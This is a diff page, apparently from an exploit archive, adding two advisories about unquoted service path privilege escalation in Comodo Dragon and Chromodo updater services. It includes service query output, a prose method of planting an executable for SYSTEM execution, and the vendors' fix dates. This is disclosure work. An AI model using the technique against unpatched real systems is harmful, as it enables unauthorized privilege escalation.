Comodo Dragon Browser Update Service (DragonUpdater) installs as a service with
|
||||
an unquoted service path running with SYSTEM privileges.
|
||||
This could potentially allow an authorized but non-privileged local
|
||||
user to execute arbitrary code with elevated privileges on the system.
|
||||
|
||||
|
||||
2. Proof of Concept
|
||||
|
||||
C:\>sc qc DragonUpdater
|
||||
[SC] QueryServiceConfig SUCCESS
|
||||
SERVICE_NAME: DragonUpdater
|
||||
TYPE : 10 WIN32_OWN_PROCESS
|
||||
START_TYPE : 2 AUTO_START
|
||||
ERROR_CONTROL : 1 NORMAL
|
||||
BINARY_PATH_NAME : C:\Program Files (x86)\Comodo\Dragon\dragon_updater.exe
|
||||
LOAD_ORDER_GROUP :
|
||||
TAG : 0
|
||||
DISPLAY_NAME : COMODO Dragon Update Service
|
||||
DEPENDENCIES :
|
||||
SERVICE_START_NAME : LocalSystem
|
||||
|
||||
|
||||
3. Exploit:
|
||||
|
||||
A successful attempt would require the local attacker must insert an executable file
|
||||
in the path of the service.
|
||||
Upon service restart or system reboot, the malicious code will be run with elevated privileges.
|
||||
|
||||
|
||||
Additional notes :
|
||||
|
||||
Fixed in version 52.15.25.664
|
||||
https://forums.comodo.com/news-announcements-feedback-cd/comodo-dragon-v521525664-is-now-available-for-download-t116786.0.html
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
=========================
|
||||
24/09/2016 - Contact With Vendor
|
||||
26/09/2016 - Vendor Response
|
||||
03/10/2016 - Release Fixed Version
|
53
platforms/windows/local/40473.txt
Executable file
53
platforms/windows/local/40473.txt
Executable file
|
@ -0,0 +1,53 @@
|
|||
# Exploit Title: Comodo Chromodo Browser Unquoted Service Path Privilege Escalation
|
||||
# Date: 03/10/2016
|
||||
# Author: Yunus YILDIRIM (@Th3GundY)
|
||||
# Team: CT-Zer0 (@CRYPTTECH)
|
||||
# Website: http://yildirimyunus.com
|
||||
# Contact: yunusyildirim@protonmail.com
|
||||
# Category: local
|
||||
# Vendor Homepage: https://www.comodo.com
|
||||
# Software Link: https://www.comodo.com/home/browsers-toolbars/chromodo-private-internet-browser.php
|
||||
# Version: Software Version <= 52.15.25.664
|
||||
# Tested on: Windows 7 x86/x64
|
||||
|
||||
1. Description
|
||||
|
||||
Comodo Chromodo Browser Update Service (ChromodoUpdater) installs as a service with
|
||||
an unquoted service path running with SYSTEM privileges.
|
||||
This could potentially allow an authorized but non-privileged local
|
||||
user to execute arbitrary code with elevated privileges on the system.
|
||||
|
||||
|
||||
2. Proof of Concept
|
||||
|
||||
C:\>sc qc ChromodoUpdater
|
||||
[SC] QueryServiceConfig SUCCESS
|
||||
SERVICE_NAME: ChromodoUpdater
|
||||
TYPE : 10 WIN32_OWN_PROCESS
|
||||
START_TYPE : 2 AUTO_START
|
||||
ERROR_CONTROL : 1 NORMAL
|
||||
BINARY_PATH_NAME : C:\Program Files\Comodo\Chromodo\chromodo_updater.exe
|
||||
LOAD_ORDER_GROUP :
|
||||
TAG : 0
|
||||
DISPLAY_NAME : COMODO Chromodo Update Service
|
||||
DEPENDENCIES :
|
||||
SERVICE_START_NAME : LocalSystem
|
||||
|
||||
|
||||
3. Exploit:
|
||||
|
||||
A successful attempt would require the local attacker must insert an executable file
|
||||
in the path of the service.
|
||||
Upon service restart or system reboot, the malicious code will be run with elevated privileges.
|
||||
|
||||
|
||||
Additional notes :
|
||||
|
||||
Fixed in version 52.15.25.665
|
||||
https://forums.comodo.com/news-announcements-feedback-cd/chromodo-v521525665-is-now-available-for-download-t116787.0.html
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
=========================
|
||||
03/10/2016 - Contact With Vendor
|
||||
03/10/2016 - Vendor Response
|
||||
05/10/2016 - Release Fixed Version
|
Loading…
Add table
Reference in a new issue